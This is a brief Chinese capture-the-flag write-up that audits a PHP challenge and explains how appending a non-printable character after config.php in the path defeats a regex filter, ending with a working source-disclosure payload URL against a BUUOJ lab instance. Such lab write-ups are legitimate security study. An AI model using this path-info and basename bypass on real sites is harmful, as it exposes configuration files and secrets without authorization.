解题
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if (hash_equals($secret, $guess)) {
$message = 'Congratulations! The flag is: ' . FLAG;
} else {
$message = 'Wrong.';
}
}
代码审计
提示flag在config.php,第一个if是过滤config.php,看的wp,只要在后面加入一个ascii码不可见字符就可以绕过
第二个if是get请求中有source就显示源码
第三个if是POST提交guess,去才字符串,实际没有用
任取一个空白字符
构造payload:
http://8af005b0-74e0-47b4-9d10-eae1cc9d7805.node3.buuoj.cn/index.php/config.php/%C2%9A?source